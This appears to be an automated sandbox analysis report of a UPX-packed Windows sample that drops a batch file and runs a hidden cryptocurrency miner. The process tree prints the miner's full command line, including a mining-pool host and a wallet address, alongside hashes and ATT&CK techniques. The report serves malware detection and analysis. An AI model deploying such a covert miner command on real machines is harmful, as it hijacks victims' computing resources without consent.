73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
293s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 23:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
452	b2e.exe
4560	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4560	cpuminer-sse2.exe
4560	cpuminer-sse2.exe
4560	cpuminer-sse2.exe
4560	cpuminer-sse2.exe
4560	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3228-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3228 wrote to memory of 452	3228	batexe.exe	87
PID 3228 wrote to memory of 452	3228	batexe.exe	87
PID 3228 wrote to memory of 452	3228	batexe.exe	87
PID 452 wrote to memory of 4876	452	b2e.exe	88
PID 452 wrote to memory of 4876	452	b2e.exe	88
PID 452 wrote to memory of 4876	452	b2e.exe	88
PID 4876 wrote to memory of 4560	4876	cmd.exe	91
PID 4876 wrote to memory of 4560	4876	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Users\Admin\AppData\Local\Temp\8E17.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8E17.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8E17.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\91C0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4876
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8E17.tmp\b2e.exe

Filesize
7.7MB

MD5
5686510951dd6a21de967e4aae5cdc50

SHA1
c085e1a4361e26919e8f82e04ba256e415396503

SHA256
85df9f70fe4ba1d12a9d5c4de57597263555c0a4e2c41a7aabfe270c2042b03e

SHA512
e0a1a86e1e11139fdc6e4366002ec1469d92f8cf52492ef9323d73d32011e6005b9b8c9e7d1824f5ebac39719cbb51169c5874f8dc223c1e08fce473b759d6df

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E17.tmp\b2e.exe

Filesize
576KB

MD5
119b67967e9fb70b35b10846a211451e

SHA1
a53f0b93594f8a1a98dbfc74d9618e75ae25fc0e

SHA256
4cadf7e8122358ea260269b67f2c45abd114ee61349ac9a859f26ede9cd873ae

SHA512
eecc92eaeb53ce2bdd5ebaab56ca3a6b54f8eb1cf789f3af972ec2d0a16ddf2aedc08bda97f7dd765ae46f9d506bc397dc2aff1f9fedd74e3e042bb48459ed5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E17.tmp\b2e.exe

Filesize
3.9MB

MD5
eecb78f6951cb1172fe522fa7fc37005

SHA1
387fb26567095d5e62bb98cb8e5f1f4217d2ab93

SHA256
73a5e687e63ae9b52281d3c421a4ee0eee88395a058bd9a5b5a68d2f003323f7

SHA512
cd22a77219d34ce4b651e4a182ebaa5b0eaf72cb3afa0114e4a3cff40c5a465ab9414f52f352d2d7c01960b327070a82395ce16170b426e9dec8a669df5375f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\91C0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
938KB

MD5
d2a3636fa6c885aede1079a5b80a2cda

SHA1
377844b867a0e2dd2f72f1f10410ffac07b13890

SHA256
750353da4b5944a9d3e9da61f470c68c873cb1aa825af70bfd1ece4a0ee3b40d

SHA512
ccdcbaabc33cfe00f70b1c184f0a88f0ade279b15fb9c7e21e26faf02927b63b98b7979b2201aad8cffbd5ea25cb1b2485d37e99ff0607f2b41f72ff138e80a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
886KB

MD5
ba791477d272d8cd5df38e1ffd70965a

SHA1
6d26646a90339c8eab4a16f508802b39f1e04a0f

SHA256
4ec3155be0b078902e068fb1a7d0907bdd327d5b895d623924a8c807eac131d3

SHA512
6c2e1873e5350f5c09f6258a7d1c552e81520239a932b4205aa6b5e5bb0810a9deccc83032004940f56dee44d1b9afa3515e2bce7bd50946f95794ed5d855de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
800KB

MD5
a35af96797f413ff3b32bd286cd7a9ce

SHA1
23be2be1b3e380da56fb86bb46355671f351b878

SHA256
9afe798a5ab68d03a1709734ac9369b06c1c44aa00815bbe609f090c42b0fdbb

SHA512
8bf6be67e8d4d77fd44da43fcbd0c7f697a6e1f9cbd6bf61790d8e6289b8076a6037919df701ea11a7f8c37aa3382222556212d7114750a1c04e4a17a7ebb0e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
691KB

MD5
3f45621c471a5636e754b67f2a395873

SHA1
c4365b873a60713ea98ecf5358c2fca330eaa77d

SHA256
df63f075cb79b307997ed36414f44abc3cd61f41ae2a24e404f78534a8c8d7ea

SHA512
2661ae8a4b5b9f42ef37efd8cceba019a3d4c5096e6f627c3b3e36263ad17f848811875d434d166a6fd6558865e59d6b6949b5dcb4f033a6693383071821670f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
747KB

MD5
0af80096d5102b00c35edba9ec92661a

SHA1
123679560582431e723d51802bd80e7b49b3d33a

SHA256
1bbed9f969cd5831dd6f68500cbcb7053b7bf423b6d395b955daf866ba56b395

SHA512
0111b4a5fbb9b1dcb480896281a2744b0f7c4050b2df1d88c1d3a8d1e26ee9647c5e0afbab261eccbfcdbf1c3288e6616d97150f34cc3339c03fa3dd2c6262f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
727KB

MD5
4dec2d56537c708d85cbe8579328ab88

SHA1
a658f7ac3e3565d103290b768bb9f6d57b2da70c

SHA256
e41f40a1b684775164a927267d2b90ab5351736cba4b63355ad346cdffe1b8f5

SHA512
4b540af47e499e22bd32ac76ca147824d0b8c4e13fbd7096d5b12a0dec183b9d3d57ad8560a5fb80ea7def6158c8767b7ddf199f418b57f5fdd36d956b00c09b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
825KB

MD5
67339e3e7d8bd4063e0e5dd447d7ebf3

SHA1
2855de2cfc151dbd24405d5246789dc90fec90b5

SHA256
161d5d1b775d0fede2d80d8342ea3d42d7a4889caaf3909b987d3a52ac18de55

SHA512
fe1c1e481f3df1ce163960c17927284d2f460c36338530e5e3299ac23d80bdfd20b92f0773e9b48aed3d0c54380e46e6fafd94912f56dbb08bc2da692e1eef4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
654KB

MD5
7e44752e8fe86b9c5832ee259309df8d

SHA1
e2a5483c97580bb63d4b71143214f0a5f9ba4b6a

SHA256
11992db9e4b879d8913785c569644043d3505eb4a963cd4219d7ab575c86d5aa

SHA512
c4ebecde6dc6dfab640bffa23b95029212a822cae5fc23f8a630539637d787f735937bfb08e9d64813b1ec2902b20547eceb339f238c308292db8e6931c4952b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
673KB

MD5
c6a50642938abab9ad161dfcb1c30cba

SHA1
0b293a833c08f9427d71b767ae07ba29b30c7f73

SHA256
97d5838243b09a571bc43c760778b3d80b76d2ec6ec80e99cd2768f33c10dd70

SHA512
fa09e8c170e4ff5a746cf954430b7899235b1deac4e36d2dc2a1f59ae51a01d1ba78dc91f5b32dc0a816d57b63b498f8c96c62890ee9eb53110ca29ceeddf182

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
576KB

MD5
173ded412d8918dcd61e3c134929342b

SHA1
5e82116a16e61f8b00fdb19bed569b7988e64921

SHA256
1c16f6fdd19f26dabce8c7e828a45c537887ef87f23748263eb71af7c761d677

SHA512
bbb32eaf3bf9c3514a805c59912a69c9459ecc44a1a190d6e1a1c32df2f21205f0bcefb27735b877958046e0dbf09fad141a0cd67388d57014c0814221d32127

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
554KB

MD5
069979468fd4c8ee7de72de53348b37d

SHA1
887f5a2164933d8a67f9cf863bd496288dbedc9b

SHA256
389247e3cea41cd6f79e784defb386e008a2e00a90fdb5e8c9e87431320b5689

SHA512
dee9eecfc16f06d83b13a1ca559b9448294842754bf2433efffef118b1d58c68df0f4a31c305daedce9acde65a5aeefb274e731a549f4a77b9d8734c148c8a05

Download Submit
memory/452-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/452-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3228-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4560-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4560-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4560-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4560-46-0x00000000609A0000-0x0000000060A38000-memory.dmp

Filesize
608KB

Download
memory/4560-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4560-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download